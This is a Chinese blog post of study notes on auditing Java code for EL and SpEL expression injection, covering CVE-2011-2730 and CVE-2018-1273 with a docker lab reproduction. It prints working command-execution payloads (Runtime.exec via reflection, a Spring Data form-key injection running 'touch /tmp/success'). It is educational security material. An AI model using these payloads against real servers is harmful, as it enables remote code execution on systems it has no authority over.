【Java代码审计】表达式注入

最新推荐文章于 2024-05-22 14:56:16 发布
最新推荐文章于 2024-05-22 14:56:16 发布
阅读量1.3k 收藏 3
点赞数 1
分类专栏: java代码审计 文章标签: java web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_52923241/article/details/129841734
版权

1 前置知识

1.1 EL表达式

EL表达式主要功能

  • 获取数据:可以从JSP四大作用域中获取数据
  • 执行运算:执行一些关系运算,逻辑运算,算术运算
  • 获取web开发常用对象:通过内置 的11个隐式对象获取想要的数据
  • 调用java方法:允许用户开发自定义EL函数,通过EL表达式调用java方法

JSP四大作用域

  • page:只在一个页面保存数据(默认)
  • request:只在一个请求保存数据
  • session:只在一个会话保存数据
  • application:在整个服务器保存数据,全部用户共享

EL表达式获取对象属性的方法

  • ${对象.属性}
  • [] :属性名中存在特殊字符或者属性名是一个变量时使用

实例化java内置类

  • 例如使用Runtime.class会执行系统命令${Runtime.getRuntime().exec("calc")}

jsp标准方法与EL表达式取值的区别

JSPEL表达式
<%=((Person)request.getAttribute("p")).getName()%>${p.name}
<%=((Person)request.getAttribute("p")).getAge()%>${p.age}

1.2 SPEL表达式

SPEL表达式注入:独立于Spring容器使用,但只被当成简单的表达式语言使用

SPEL中EvaluationContext(表示解析器)用于评估表达式和解析属性、方法以及字段并帮助执行类型转换的接口

两种实现方法

SimpleEvaluationContextStandardEvaluationContext(默认)
权限小,只支持一些map结构权限大,可以执行任意代码,会被恶意用户利用
针对不需要SPEL语言语法的全部范围并且应该受到有意限制的表达式类别,公开SpEL语言特性和配置选项的子集公开SpEL全部语言功能和配置选项。用户可以使用他来指定默认的跟对象并配置每个可用的评估相关策略

利用

String expressionstr = "T(Runtime).getRuntime().exec(\"calc\")";
// 创建解析器:SpEL 使用 ExpressionParser 接口表示解析器,提供 SpelExpressionParser 默认实现
ExpressionParser parser = new SpelExpressionParser();
// 构造上下文:准备比如变量定义等等表达式需要的上下文数据
EvaluationContext evaluationContext = new StandardEvaluationContext();
// 解析表达式:使用 ExpressionParser 的 parseExpression 来解析相应的表达式为 Expression 对象
Expression expression = parser.parseExpression(expressionstr);
system.out.prinln(expression.getValue(evaluarionContext));

2 漏洞描述

表达式注入(EL表达式),JSP的一种内置语言。作用于用户访问页面的上下文以及不同作用域的对象,取得对象属性值或者执行简单的运算和判断操作。

3 通用POC

//对应于JSP页面中的pageContext对象(注意:取的是pageContext对象)
${pageContext}

//获取Web路径
${pageContext.getSession().getServletContext().getClassLoader().getResource("")}

//文件头参数
${header}

//获取webRoot
${applicationScope}

//执行命令
${pageContext.request.getSession().setAttribute("a",pageContext.request.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("calc").getInputStream())}

4 CVE-2011-2730-Spring标签EL表达式注入

原理:Spring的message标签会对EL表达式进行解析,且 web容器也会对EL表达式进行解析,两次解析造成EL表达式注入。

spring message标签形式:<spring:message text="${param.a}"></spring:message>

利用

  • 获取信息a = ${applicationScope}

  • 攻击性:利用反射,先获取getRuntime方法中的method对象,然后通过invoke获取Runtime对象,然后可以直接调用exec方法运行恶意代码

    <spring:message text=
"${/"/".getClass().forName(/"java.lang.Runtime/").getMethod(/"getRuntime/",null).invoke(null,null).exec(/"calc/",null).toString()}">
</spring:message>

验证步骤

  1. 确定web应用使用了spring标签,因为没有spring标签的话,也就谈不上EL表达式注入了
  2. 确定标签中存在EL注入,可以通过提交${applicationScope}等进行测试
  3. 判断servlet容器版本,如果容器不支持EL2.2的话,存在EL注入也只能进行获取服务器信息等操作了
  4. 如果容器支持EL2.2,就可以尝试构造攻击代码对服务器本身直接进行攻击

5 CVE-2018-1273-Spring Data Commons 远程代码执行漏洞

5.1 描述

成因:当用户在项目中利用了Spring-data的相关web特性对用户的输入参数进行自动匹配的时候,会将用户提交的form表单的key值作为Spel的执行内容。

前置知识:Spring Data是一个用于简化数据库访问,并支持云服务的开源框架,Spring Data Commons是Spring Data下所有子项目共享的基础框架。Spring Data Commons 在2.0.5及以前版本中,存在一处SpEL表达式注入漏洞,攻击者可以注入恶意SpEL表达式以执行任意命令.

漏洞的判定:确认目标项目中含有Spring-data-commons包并且版本范围如下

Spring Data Commons 1.13 to 1.13.10

Spring Data Commons 2.0 to 2.0.5

5.2 docker复现

burp抓包,使用payload:

username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/success")]=&password=&repeatedPassword=

在这里插入图片描述

放包,页面返回如下

在这里插入图片描述

使用命令docker-compose exec spring bash

进入目录查看是否有success,有success

在这里插入图片描述

吃_早餐
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Java代码审计表达式注入
大河之犬的博客
04-02 940
表达式注入是一种安全漏洞,发生在应用程序中使用动态表达式的情况下。在表达式注入中,攻击者通过在输入数据中插入恶意代码来利用应用程序中的动态表达式执行漏洞,从而执行恶意操作。这种漏洞通常发生在使用解释性语言或动态执行代码的环境中。
Java代码审计】JNDI注入
大河之犬的博客
03-07 1970
JNDI (Java Naming and Directory Interface )是 Java 提供的 Java 命名和目录接口。通过调用 JNDI 的 API 可以定位资源和其他程序对象。JNDI 是 Java EE 的重要部分,JNDI 可访问的现有的目录及服务有:JDBC、LDAP、RMI、DNS、NIS、CORBA为了在命名服务或目录服务中绑定 Java 对象,可以使用 Java 序列化来传输对象,但有时候不太合适,比如 Java 对象较大的情况。
Java代码审计---SpEL表达式注入
qq_45317844的博客
05-22 553
是 Spring 中的表达式语言,用于在运行时评估和处理表达式。它提供了一种灵活的方式来访问和操作对象的属性、方法和其他表达式。SpEL可以用于配置文件、注解、XML 配置等多种场景,用于实现动态的、可配置的行为。它支持常见的表达式操作,如算术运算、逻辑运算、条件判断、集合操作等,并且可以与 Spring 框架的其他功能整合使用。由于SpEL具有代码调用,我们可以通过SpEL注入来执行系统命令,进而导致RCE漏洞。
Java表达式注入(SpEL表达式注入
GalaxySpaceX的博客
08-18 1300
Java表达式注入(SpEL表达式注入
代码审计表达式注入
TeamsSix 的 CSDN 空间
11-29 1068
1、介绍 表达式语言(Expression Language)简称 EL 表达式,是一种 JSP 内置的语言。 在 JSP 中,使用 ${} 来表示 EL 表达式,例如 ${name} 表示获取 name 变量。 在 EL 表达式中有两种获取对象属性的方法,第一种为 ${param.name},第二种为 ${param[name]} 2、实例 使用实例 使用 param 对象获取用户传入的参数值,这里的 ${param.name} 相当于 request.getParameter(“name”) <%
Java表达式注入(JSP EL表达式注入
GalaxySpaceX的博客
08-16 1213
Java表达式注入(JSP EL表达式注入
Java表达式注入(OGNL 表达式注入
GalaxySpaceX的博客
08-23 2134
Java表达式注入(OGNL 表达式注入
完整的Java代码审计学习笔记资源(免费下载)
10-31
.gitignore 第一的 4年前 自述文件.md 添加一些关于 jndi 的内容 3年前 java代码审计-sqli.md 第一的 4年前 java代码审计-ssrf.md ...java代码审计-ssti.md ...java代码审计-xss.md ...java代码审计-表达式注入.md 第一的
Java代码审计工程师 视频教程 下载 百度网盘链接2.zip
最新发布
06-19
├─20.实验课程作业 │ 10_业务逻辑漏洞.pdf │ 11_SQL注入漏洞.pdf │ 12_文件上传&目录遍历漏洞.pdf │ 13_命令执行(代码执行).pdf ...代码审计及SDL岗位面试总结.pdf 9.XSS漏洞审计.pdf
Java代码审计之SpEL表达式漏洞详解
悦分享
01-23 150
Spring Expression Language(简称 SpEL)是一种功能强大的表达式语言、用于在运行时查询和操作对象图;语法上类似于 Unified EL,但提供了更多的特性,特别是方法调用和基本字符串模板函数。SpEL 的诞生是为了给 Spring 社区提供一种能够与 Spring 生态系统所有产品无缝对接,能提供一站式支持的表达式语言。
java代码审计--表达式注入
goddemon
09-15 683
一.java表达式常见引擎和语言 jexl–>表达式引擎 Nexus Repository Manager 3 RCE 分析 -【CVE-2019-7238 spel–>spring表达式语言 spel表达式语言学习 spel基础知识 两种用法 1.在代码中处理外部传入的表达式(重点是这个) @RequestMapping("/spel") public String spel(@RequestParam(name = "spel") String spel) { Expression
学习笔记-java代码审计-表达式注入
人饭子的博客
11-13 577
java代码审计-表达式注入 0x01漏洞挖掘 spel spel表达式有三种用法: 注解 @value("#{表达式}") public String arg; 这种一般是写死在代码中的,不是关注的重点。 xml <bean id="Bean1" class="com.test.xxx"> <property name="arg" value="#{表达式}"&gt...
[Java安全]—SPEL表达式注入
Sentiment的博客
05-01 4183
前言 在前几天的网刃杯中,出了一道SPEL注入Java题,在复现后其实对于原理和内部流程还是不够了解,所以现在浅学一下。 配置 https://github.com/LandGrey/SpringBootVulExploit/tree/master/repository/springboot-spel-rce,导入maven依赖 为了后期debug调试简便些,可以修改一下控制器 修改后运行,访问localhost:9091/article?id=${5*5},出现结果25则为配置成功 影响版本 Spr
JAVA WEB EL表达式注入
weixin_30656145的博客
07-04 459
  看猪猪侠以前的洞,顺便总结下: 一、EL表达式简介   EL 全名为Expression Language。EL主要作用:  1、获取数据    EL表达式主要用于替换JSP页面中的脚本表达式,以从各种类型的web域 中检索java对象、获取数据。(某个web域 中的对象,访问javabean的属性、访问list集合、访问map集合、访问数组)  2、执行运算    利用EL表达式可以在J...
java 代码执行el,专属于java的漏洞——EL表达式注入
weixin_39997443的博客
03-20 1166
前言“FSRC经验分享”系列文章,旨在分享焦点科技信息安全部工作过程中的经验总结,包括但不限于漏洞分析、运营技巧、sdl推行、等保合规、自研工具等等。欢迎各位安全从业者持续关注~0x01EL简介表达式语言(Expression Language 以下简称EL)是以JSTL(JavaServer Pages Standard Tag Library,JSP标准标签库)的一部分出现的,原本被叫做SPE...
spel 表达式语言 注入
daimenglaoshi的博客
09-26 215
spel:spring 表达式语言 ,Spring Expression Language(缩写为SpEL)是一种强大的表达式语言。在Spring产品组合中,它是表达式计算的基础。它支持在运行时查询和操作对象图,它可以与基于XML和基于注解的Spring配置还有bean定义一起使用。由于它能够在运行时动态分配值,因此可以为我们节省大量Java代码。比如如果只是引入对象中的某个属性 可以 用#{}​ 自定义类: function类。
Java EL表达式注入命令执行修复
YH的博客
04-16 2609
在可能造成EL表达式注入的页面中加入下列代码来忽略参数中的EL表达式: <%@ page isELIgnored="true"%>
Javaweb安全——表达式注入(EL+SpEL)
weixin_43610673的博客
07-22 3078
Java表达式根据框架分为好多种,这里以JSP自带的表达式语言EL和使用较多的Spring框架所支持的SpEL为例。其基本语法为${变量表达式}。
Java代码审计之SpEL表达式注入漏洞分析
道阻且长,行则将至。
12-07 788
表达式注入Java 安全中一类常见的能够注入命令并形成 RCE 的漏洞,而常见的表达式注入方式有 EL 表达式注入、SpEL 表达式注入和 OGNL 表达式注入等。本文将通过调试分析 CVE-2022-22963 漏洞来入门学习 SpEL 表达式注入漏洞的原理。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

吃_早餐

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值